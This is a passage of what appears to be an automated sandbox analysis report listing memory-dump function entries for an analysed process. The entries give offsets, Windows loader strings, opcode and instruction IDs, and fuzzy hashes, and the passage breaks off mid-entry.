                                            Strings
                                            • LdrResSearchResource Exit, xrefs: 019DAA25
                                            • LdrResSearchResource Enter, xrefs: 019DAA13
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                            • API String ID: 0-4066393604
                                            • Opcode ID: edb7d05037fa03b395c41961cc9f319a6319afda68902eae542fef45bf05c5a8
                                            • Instruction ID: 67191e90fc6d9fcba1fcd08597282b7d6562756f31ad5fb98bf4e30af2a5cf22
                                            • Opcode Fuzzy Hash: edb7d05037fa03b395c41961cc9f319a6319afda68902eae542fef45bf05c5a8
                                            • Instruction Fuzzy Hash: 36E1B171E04209AFEF22CFA9C980BAEBBBABF54310F148526F905E7241D778D951CB51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: `$`
                                            • API String ID: 0-197956300
                                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                            • Instruction ID: 48288706600b1203beac56b3f7e960c94911822a5b449561112a7826247a42b1
                                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                            • Instruction Fuzzy Hash: 9FC1C0312043429BEF25CF28C945B6BBBE5AFC4318F184A2EF696CB291D774D585CB81
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Legacy$UEFI
                                            • API String ID: 2994545307-634100481
                                            • Opcode ID: 0aebde58651bf0701f48cbfc48c60eaa0ced6bb242ce58991e8af355efb3cfe9
                                            • Instruction ID: 632756f598eac052bcb535c36aa881c13eb6c1bdf069b348a3f9e01860ee62e3
                                            • Opcode Fuzzy Hash: 0aebde58651bf0701f48cbfc48c60eaa0ced6bb242ce58991e8af355efb3cfe9
                                            • Instruction Fuzzy Hash: 54614B71E003199FEB15DFA9C980BAEBBF5FB88710F14406DE649EB251D735A900CB50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$MUI
                                            • API String ID: 0-17815947
                                            • Opcode ID: 85365eb48d13fe908813e0a5327311b818da0a24ce4439a824cf4719c6605e99
                                            • Instruction ID: 13fac79b82e66ff6acd683cb757fed50fe4f76a8f7b5f38424d253e259c00b68
                                            • Opcode Fuzzy Hash: 85365eb48d13fe908813e0a5327311b818da0a24ce4439a824cf4719c6605e99
                                            • Instruction Fuzzy Hash: F8510A71E0021DAFEB11DFA9CD90AEEBBB8EB48754F10452AE615B7290D7309E05CB60
                                            Strings
                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 019D063D
                                            • kLsE, xrefs: 019D0540
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                            • API String ID: 0-2547482624
                                            • Opcode ID: 56f7f28dca2d8bbd21bdaf56626f21bc4ea9915f628c8092265e7525eccabd36
                                            • Instruction ID: 14bb35e3ccf6f37f5d192c8348b86715b9b8347033e13ff7eb7fe6dc11072b99
                                            • Opcode Fuzzy Hash: 56f7f28dca2d8bbd21bdaf56626f21bc4ea9915f628c8092265e7525eccabd36
                                            • Instruction Fuzzy Hash: 9B51EF715007428FD724EF29C5406A7BBE8AF84305F18893EFAEE87241E730D545CB92
                                            Strings
                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 019DA309
                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 019DA2FB
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                            • API String ID: 0-2876891731
                                            • Opcode ID: 036f5f94fd3c58bf746866803b2dd1e4b5fa72b6a475ea217d058e96c796a4a9
                                            • Instruction ID: fbff43216e4aaff517b1babe5d8ef67ff6d599a03ec954fe903d79c25198ae28
                                            • Opcode Fuzzy Hash: 036f5f94fd3c58bf746866803b2dd1e4b5fa72b6a475ea217d058e96c796a4a9
                                            • Instruction Fuzzy Hash: 4841B231A04649DFEB15CF59C440B6DBBF5FF85700F1484A6E908DB291EBB6D940CB50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Cleanup Group$Threadpool!
                                            • API String ID: 2994545307-4008356553
                                            • Opcode ID: e5b4e49110d792805910479513038ba09098ea2f6923df6cc7bf806dc85ab400
                                            • Instruction ID: 7b36373f3aca620bccbdf43f7500bcaa1dd15543eeec44e7f9764b38f6adedcd
                                            • Opcode Fuzzy Hash: e5b4e49110d792805910479513038ba09098ea2f6923df6cc7bf806dc85ab400
                                            • Instruction Fuzzy Hash: C401D1B2240700AFE312DF14DE45B2677F8E785715F058939A64CCB190F734D805CB46
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: MUI
                                            • API String ID: 0-1339004836
                                            • Opcode ID: 3a44eedcd420a78845667d6e8071e853420b91e5bdde41ca046eb5b44f30b445
                                            • Instruction ID: da2d4b681f9ef7b541f6cbf4a4842c417f0c7281d00964002e9cd223bdd39a04
                                            • Opcode Fuzzy Hash: 3a44eedcd420a78845667d6e8071e853420b91e5bdde41ca046eb5b44f30b445
                                            • Instruction Fuzzy Hash: D1826975E002198FEB25CFA9C980BEDBBB5BF48710F14C169E95DAB391DB30A941CB50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-3916222277
                                            • Opcode ID: 06ecc31848c4b5403a9b64b26ab4e505c1bd3d6c07f2711eceadd413144134a5
                                            • Instruction ID: 4205309130565c56965337825bbb91c569639673b354740c2d6d707f5f69642d
                                            • Opcode Fuzzy Hash: 06ecc31848c4b5403a9b64b26ab4e505c1bd3d6c07f2711eceadd413144134a5
                                            • Instruction Fuzzy Hash: 40917172940219BFEB21DF95CD85FAE7BB8EF54750F540059FB05AB190D674AD00CBA0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-3916222277
                                            • Opcode ID: 6a23c9bd5a8efad2cbe941e0c989a530c53c71e4e42d1c5988ada8caed50d0ca
                                            • Instruction ID: 60e90fe9d758792b3fa416e9c5736aa50b194bb528cf4ac296b577e9f2b4ba6a
                                            • Opcode Fuzzy Hash: 6a23c9bd5a8efad2cbe941e0c989a530c53c71e4e42d1c5988ada8caed50d0ca
                                            • Instruction Fuzzy Hash: 4D91BE72A00649BFDF22AFA5DD44FAFBBB9EF85750F140069F605A7250DB349A01CB90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: GlobalTags
                                            • API String ID: 0-1106856819
                                            • Opcode ID: 9065b7485f0d4b2d2040b16a278cd2c3dce6873d17ea70e4f73baedf9abdb9cb
                                            • Instruction ID: 2897243c900cfb5e2a1d69ae3433555be05ed8d2b424ab63d1dd97d918fb9e51
                                            • Opcode Fuzzy Hash: 9065b7485f0d4b2d2040b16a278cd2c3dce6873d17ea70e4f73baedf9abdb9cb
                                            • Instruction Fuzzy Hash: DB718FB5E0020ADFEF29CF9CD9906EDBBB1BF99710F14812EE909A7241E7359941CB50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .mui
                                            • API String ID: 0-1199573805
                                            • Opcode ID: 40bf2c64a227e55545135269000c2a3f1c9db0ea6d98b7525c019759d806b6a4
                                            • Instruction ID: 9812299e0537bf7a98e85511aba5e124bc0a88d060770ec97e880f0ffc043683
                                            • Opcode Fuzzy Hash: 40bf2c64a227e55545135269000c2a3f1c9db0ea6d98b7525c019759d806b6a4
                                            • Instruction Fuzzy Hash: 17517272D0022A9BDF11EF99DC40AAEBBB4FF58710F094169EA15BB250D7349E01CBE4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: EXT-
                                            • API String ID: 0-1948896318
                                            • Opcode ID: f0ea6edd983b6122dad3edd891999f38d1170ca3edf1ad360de6f7d7da73982d
                                            • Instruction ID: c9b137ac9be73ab93d8a3d0c1d7eacf22f998651300876488971972cd40af182
                                            • Opcode Fuzzy Hash: f0ea6edd983b6122dad3edd891999f38d1170ca3edf1ad360de6f7d7da73982d
                                            • Instruction Fuzzy Hash: CD41D072548312ABD712DA75D848B6BBBECAFC8B14F04092DFA8CD7140E675D904C796
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: BinaryHash
                                            • API String ID: 0-2202222882
                                            • Opcode ID: 787f70f6f79e91b6bbe01e801a67168aafecacc02a994b452db1fb17de01d67e
                                            • Instruction ID: c23cae4afea16a92b18a78c4bdf28d810a8542fcc40684d6eae516900ede83dc
                                            • Opcode Fuzzy Hash: 787f70f6f79e91b6bbe01e801a67168aafecacc02a994b452db1fb17de01d67e
                                            • Instruction Fuzzy Hash: 284133B1D0112DABEB21DB50CD84FDEB77DAB94724F0045A5EA0CAB144DB709E89CFA4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: #
                                            • API String ID: 0-1885708031
                                            • Opcode ID: 62adcddd4f9eeefa857418d29899899e069db5cfc7c027b79dc928188f3166fd
                                            • Instruction ID: 23e27d81f5a02533efed084efb27705eeade381df8c10d6754d4c8c3a68cb75c
                                            • Opcode Fuzzy Hash: 62adcddd4f9eeefa857418d29899899e069db5cfc7c027b79dc928188f3166fd
                                            • Instruction Fuzzy Hash: C8310831A00B199BEB22DF69C854BFE7BBCDF44704F144068EA49AB286D775E805CB90
                                            Strings
                                            • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01A5895E
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                            • API String ID: 0-702105204
                                            • Opcode ID: a10e8b3c455fbda0d9df1e65b1c62756ed6a4539babdb55f982ba7fc7033124c
                                            • Instruction ID: d662dc1093bf7f72a6557fa2a52ea1bccbe924fd0741b702e1d5de2e32f05d08
                                            • Opcode Fuzzy Hash: a10e8b3c455fbda0d9df1e65b1c62756ed6a4539babdb55f982ba7fc7033124c
                                            • Instruction Fuzzy Hash: C801F732308211EFE7605B5BCC84A66BFB6FFC5654F08001CFA4657151CB346841C792
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ba630873ac82f6c9088f72c746e3a3f9386aaced5c8ff770340ec5874617fcde
                                            • Instruction ID: f13da0d8570b8a8082f3775ac586b3586dd1cdcff84ce4084ef7bbb9f3a011c5
                                            • Opcode Fuzzy Hash: ba630873ac82f6c9088f72c746e3a3f9386aaced5c8ff770340ec5874617fcde
                                            • Instruction Fuzzy Hash: D042C5366083419BD726CF68CC90B6BBBE5BFC8700F08492EFA8697251D771DA45CB52
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 881b27d872a166dd4045c5517e99b5a618d8aab945f09d5b01d2783686b4c2c5
                                            • Instruction ID: ba8342b5d6a6696e7de27273d905461276d5afeeaca585e857f4e6497445ab78
                                            • Opcode Fuzzy Hash: 881b27d872a166dd4045c5517e99b5a618d8aab945f09d5b01d2783686b4c2c5
                                            • Instruction Fuzzy Hash: 94423E75E103199FEB25CF69C841BADBBF9BF88300F148199E949EB242D7389985CF50
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0c973c439bcc59ce7016d0dc757a3478dc5c66544cdc4f0cf25010924f21f45f
                                            • Instruction ID: 1953b614f7e0ebe5ff63bdfc036260c54f620c72699e35a0023a420d8ad51ad3
                                            • Opcode Fuzzy Hash: 0c973c439bcc59ce7016d0dc757a3478dc5c66544cdc4f0cf25010924f21f45f
                                            • Instruction Fuzzy Hash: 8532DE70A00755ABDB26CF69C9447BEBBF2BFC8304F24411DE58A9B285D735AA42CB50
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a5e843fa3d0b7c5ee4910bd815ec22968a606f107513a27c433fa804b6a08a23
                                            • Instruction ID: 75cffad4c7fcd3d5812c83231221486c9a2ab1a9b76466552cbc3c0495f753e7
                                            • Opcode Fuzzy Hash: a5e843fa3d0b7c5ee4910bd815ec22968a606f107513a27c433fa804b6a08a23
                                            • Instruction Fuzzy Hash: 1E22C275204661AFEB25CF2DC89437ABBF1AF44300F0C8459E996CF286E735E652CB60
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f1cf0c65459932c2008bda73c7745763805440c946e09e896473a6531f05dbb2
                                            • Instruction ID: f2500f0269170a9ee6d2d2f841e5bdc022e53c35c23ea7fd3e4d0362742f8c03
                                            • Opcode Fuzzy Hash: f1cf0c65459932c2008bda73c7745763805440c946e09e896473a6531f05dbb2
                                            • Instruction Fuzzy Hash: 8532A175A05205CFDB25CFA8C580BAEBBF5FF88310F148569E95AAB391D734E841CB50
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                            • Instruction ID: 8fc20d029695aa070dce194fb2583b14438e8fcd5bd7b4ad6366e63c52a95aaa
                                            • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                            • Instruction Fuzzy Hash: D1F16171E0021AABDB15CF99D580BBEBBF6AF84710F05812DEA09EB341D774E841CB60
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a6e50123505259ad99f1e9b8adecf601d73d8d4d3dcfa5a3f1ac278733ff3645
                                            • Instruction ID: 2887c639dc75c91475377b6cb6cd276158e3f1848c03e287dd95758dc76a4f2c
                                            • Opcode Fuzzy Hash: a6e50123505259ad99f1e9b8adecf601d73d8d4d3dcfa5a3f1ac278733ff3645
                                            • Instruction Fuzzy Hash: ACD1F072A0070A8BDF15CF69C841ABEBBFDAF88304F198169D955E7241E739E9058B60
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6ff033d17e2151a423226428848146cb58240e6aded6eb0a4ec9969371035d36
                                            • Instruction ID: d8fda79f20e77c4b43532bace20355fe5a9cc448c1a4273198d75b915ae00864
                                            • Opcode Fuzzy Hash: 6ff033d17e2151a423226428848146cb58240e6aded6eb0a4ec9969371035d36
                                            • Instruction Fuzzy Hash: 0CE16B71608342CFC715CF28C590A6ABBF5FF89314F058A6DE99987351EB31E905CB92
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4943accc7790dad3dcdb2af334c5b9bd3d86fd4c188e32a74182c1edcebee406
                                            • Instruction ID: 9a2b9283e3fa4b3c0045fe69d87a2200c1b88f3b28fd2f84b318c40d372b2a38
                                            • Opcode Fuzzy Hash: 4943accc7790dad3dcdb2af334c5b9bd3d86fd4c188e32a74182c1edcebee406
                                            • Instruction Fuzzy Hash: A7D1E671A00216DBDB14DF68C890EBAB7E5FF94B04F04462DE95ADB280F734E951CB61
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                            • Instruction ID: d6b4ddc92f837e5a3becab9ac1acd36df5ad05b4e36395698810f4f81bc91096
                                            • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                            • Instruction Fuzzy Hash: 61B1B274A04705AFDB64DFAAC940AAFBFB9FF84344F10441DAE5297395DA38E906CB10
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                            • Instruction ID: a09ca0b528a6f4a5fc371a7f195043dc046b738e4078cf7506427ad98d573404
                                            • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                            • Instruction Fuzzy Hash: C6B106317046469FDB12DBA8C844BBEBBF6AF88700F284559F556DB281DB70ED41CB90
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 553759dcac8e8d5897a38154a2f0b446d4cf3f160507e332c7c674d2d8da210a
                                            • Instruction ID: ebe85d2e231bd047a65272b670492acf21547d566228da564c9447eb926e4467
                                            • Opcode Fuzzy Hash: 553759dcac8e8d5897a38154a2f0b446d4cf3f160507e332c7c674d2d8da210a
                                            • Instruction Fuzzy Hash: A4C148741083418FD764CF19C494BABB7E9FF88704F44896EE98987291D775E908CFA2
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0fea61646d114f211ce7a93e36835239cc90b934e903a68080a4b0c971770eda
                                            • Instruction ID: c8e0f7b8dc6666d19e6edcd9b08c1a82557201dab0cdd64b5aebfc9a1896bfa3
                                            • Opcode Fuzzy Hash: 0fea61646d114f211ce7a93e36835239cc90b934e903a68080a4b0c971770eda
                                            • Instruction Fuzzy Hash: 1AB19070A042668BDB24CF68C990BA9B7B5EF54B10F0485EDD54EE7281EB30DDC5CB21
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 19a0d0915c19174c092e04055fc12fae1dafa08ad9a6fe955a05e052501e5d9a
                                            • Instruction ID: 14bee264f0071b4f978c584792e922aa536b1499c4c04ece109917c38ab44501
                                            • Opcode Fuzzy Hash: 19a0d0915c19174c092e04055fc12fae1dafa08ad9a6fe955a05e052501e5d9a
                                            • Instruction Fuzzy Hash: D2A12931E00659AFEB22DB5CC944FAEBBB4BF44714F050129FB14AB2A1D7749D41CB92
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b5944405cde9a8141393169d78a3e407c2c0bbcdabf8ed03f2e4d915fa8747f2
                                            • Instruction ID: a54e60607ffd3ebf7bcb7a1bb5465916b51aebea1c3cb0a73d739e1375d2b185
                                            • Opcode Fuzzy Hash: b5944405cde9a8141393169d78a3e407c2c0bbcdabf8ed03f2e4d915fa8747f2
                                            • Instruction Fuzzy Hash: 78A1D170B006169FDB25CF69CA90BABB7B5FF98314F044029FA45D7286DB34E852CB90
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 87a5b76253d6667c3ec747bd3b1d7526170a8c09406086d6b70d6c801b56ffe9
                                            • Instruction ID: e10a9d09c53ad98a6617bf54d0e8e283cf8a06cbcf0ca2654ea2bd5b8fcd9782
                                            • Opcode Fuzzy Hash: 87a5b76253d6667c3ec747bd3b1d7526170a8c09406086d6b70d6c801b56ffe9
                                            • Instruction Fuzzy Hash: 54A1CE72A04252AFD712DF18C980B2ABBE9FF8C704F89052CF5899B651D7B0ED01CB91
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                            • Instruction ID: 5582c5cd86c53d5124f02dff1c9d04387b1d6d2328eb2b25e735a7f41d72df8e
                                            • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                            • Instruction Fuzzy Hash: 45B14A71E0061ADFDF29CFA9C880BADBBB5FF48310F54812AE914A7351D730A955CB90
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5a440aec0d5e081b27f2d15a07cef7b3af4650369ac1aecb65ebfd9e6e80a049
                                            • Instruction ID: afe64292622271f3bc6320557f073bf89a036060759948f05058416fd42f29e6
                                            • Opcode Fuzzy Hash: 5a440aec0d5e081b27f2d15a07cef7b3af4650369ac1aecb65ebfd9e6e80a049
                                            • Instruction Fuzzy Hash: 5991D371E04216AFDF55CFA8D884BBEBFB5AF48710F554169EA18EB341D734E9008BA0
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
